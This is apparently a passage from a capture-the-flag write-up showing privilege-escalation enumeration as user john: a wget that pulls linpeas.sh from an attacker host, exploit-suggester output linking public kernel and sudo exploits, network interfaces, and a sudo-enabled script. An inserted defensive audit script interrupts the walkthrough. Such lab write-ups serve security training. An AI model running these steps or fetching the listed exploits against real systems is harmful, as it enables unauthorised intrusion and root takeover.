PEAS
john@cybermonday:/dev/shm$ wget -q http://10.10.14.12/linpeas.sh ; chmod 755 /dev/shm/linpeas.sh
Delivery complete
Executing PEAS
CVEs
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2021-3490] eBPF ALU32 bounds tracking for bitwise ops
Details: https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story
Exposure: probable
Tags: ubuntu=20.04{kernel:5.8.0-(25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52)-*},ubuntu=21.04{kernel:5.11.0-16-*}
Download URL: https://codeload.github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490/zip/main
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
[+] [CVE-2022-0847] DirtyPipe
Details: https://dirtypipe.cm4all.com/
Exposure: probable
Tags: ubuntu=(20.04|21.04),[ debian=11 ]
Download URL: https://haxx.in/files/dirtypipez.c
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2022-2586] nft_object UAF
Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
Exposure: less probable
Tags: ubuntu=(20.04){kernel:5.12.13}
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: mint=19,ubuntu=18|20, debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
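As an added defensive check (not part of the write-up and not code from linux-exploit-suggester), the sysctl and module preconditions the suggester attached to the CVEs above can be classified on a host so an administrator can see which candidates hardening already blocks; the verdict names and the `audit_host` helper are this example's own:

```shell
#!/bin/sh
# Added example (not from the write-up or from linux-exploit-suggester): classify
# the kernel-side preconditions that LES attached to the CVEs above.
# Verdicts: precondition_met / precondition_absent / unknown.

# sysctl_value NAME: value of /proc/sys/<NAME with dots as slashes>, or "missing"
# when this kernel does not expose it (unprivileged_userns_clone is Debian/Ubuntu only).
sysctl_value() {
    f="/proc/sys/$(printf '%s' "$1" | tr . /)"
    if [ -r "$f" ]; then cat "$f"; else echo missing; fi
}

# CVE-2021-3490: LES requires kernel.unprivileged_bpf_disabled != 1.
# Value 2 (disabled until an admin sets it back to 0) also blocks unprivileged bpf().
verdict_bpf() {
    case "$1" in
        0)   echo precondition_met ;;
        1|2) echo precondition_absent ;;
        *)   echo unknown ;;
    esac
}

# CVE-2022-32250 / CVE-2022-2586: LES requires kernel.unprivileged_userns_clone=1.
verdict_userns() {
    case "$1" in
        1) echo precondition_met ;;
        0) echo precondition_absent ;;
        *) echo unknown ;;   # sysctl absent: user namespaces are governed elsewhere
    esac
}

# CVE-2021-22555: LES requires the ip_tables module to be loaded.
# Argument is lsmod / /proc/modules style text (module name first on each line).
verdict_iptables() {
    if printf '%s\n' "$1" | grep -q '^ip_tables[[:space:]]'; then
        echo precondition_met
    else
        echo precondition_absent
    fi
}

# audit_host: run the three checks against the live system and print a summary.
audit_host() {
    mods=$(cat /proc/modules 2>/dev/null)
    printf 'CVE-2021-3490  unprivileged_bpf_disabled  %s\n' "$(verdict_bpf "$(sysctl_value kernel.unprivileged_bpf_disabled)")"
    printf 'CVE-2022-32250 unprivileged_userns_clone  %s\n' "$(verdict_userns "$(sysctl_value kernel.unprivileged_userns_clone)")"
    printf 'CVE-2021-22555 ip_tables loaded           %s\n' "$(verdict_iptables "$mods")"
}
```

A precondition being met only says the suggester's filter would not rule the CVE out; the kernel version tags above still decide whether the host is in the affected range.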
Networks
br-ccc51e38e8e5: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.18.0.1 netmask 255.255.0.0 broadcast 172.18.255.255
inet6 fe80::42:4ff:fe8f:b77d prefixlen 64 scopeid 0x20<link>
ether 02:42:04:8f:b7:7d txqueuelen 0 (Ethernet)
RX packets 67966 bytes 205003264 (195.5 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 69764 bytes 18942194 (18.0 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
docker0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 172.17.0.1 netmask 255.255.0.0 broadcast 172.17.255.255
ether 02:42:3d:79:dd:12 txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.228 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 fe80::250:56ff:feb9:3075 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:3075 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:30:75 txqueuelen 1000 (Ethernet)
RX packets 84074 bytes 27010607 (25.7 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 79299 bytes 207663138 (198.0 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
veth7852bd0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet6 fe80::3c76:7cff:fefb:a7c6 prefixlen 64 scopeid 0x20<link>
ether 3e:76:7c:fb:a7:c6 txqueuelen 0 (Ethernet)
RX packets 246 bytes 35775 (34.9 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 309 bytes 28781 (28.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
veth8ad9cb1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet6 fe80::10ae:a3ff:fe49:e227 prefixlen 64 scopeid 0x20<link>
ether 12:ae:a3:49:e2:27 txqueuelen 0 (Ethernet)
RX packets 68434 bytes 205921257 (196.3 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 79778 bytes 218414126 (208.2 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
veth93cc5cb: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet6 fe80::c429:2cff:fe0e:a1ca prefixlen 64 scopeid 0x20<link>
ether c6:29:2c:0e:a1:ca txqueuelen 0 (Ethernet)
RX packets 12532 bytes 199615883 (190.3 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2565 bytes 176788 (172.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
vetha272285: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet6 fe80::745f:42ff:fe01:1902 prefixlen 64 scopeid 0x20<link>
ether 76:5f:42:01:19:02 txqueuelen 0 (Ethernet)
RX packets 2290 bytes 224446 (219.1 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2377 bytes 168859 (164.9 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
vethc28fe1a: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet6 fe80::18bd:17ff:feab:17a4 prefixlen 64 scopeid 0x20<link>
ether 1a:bd:17:ab:17:a4 txqueuelen 0 (Ethernet)
RX packets 698 bytes 1190135 (1.1 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1124 bytes 1195217 (1.1 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
vethc5b3571: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet6 fe80::e8e4:89ff:fe2f:a82 prefixlen 64 scopeid 0x20<link>
ether ea:e4:89:2f:0a:82 txqueuelen 0 (Ethernet)
RX packets 143 bytes 15751 (15.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 157 bytes 18132 (17.7 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Additional network information, some of which is relevant to the Docker containers.
sudo privileges
PEAS also picked up the sudo privileges of the john user.
/opt
This must be the Python script for the sudo privileges: /opt/secure_compose.py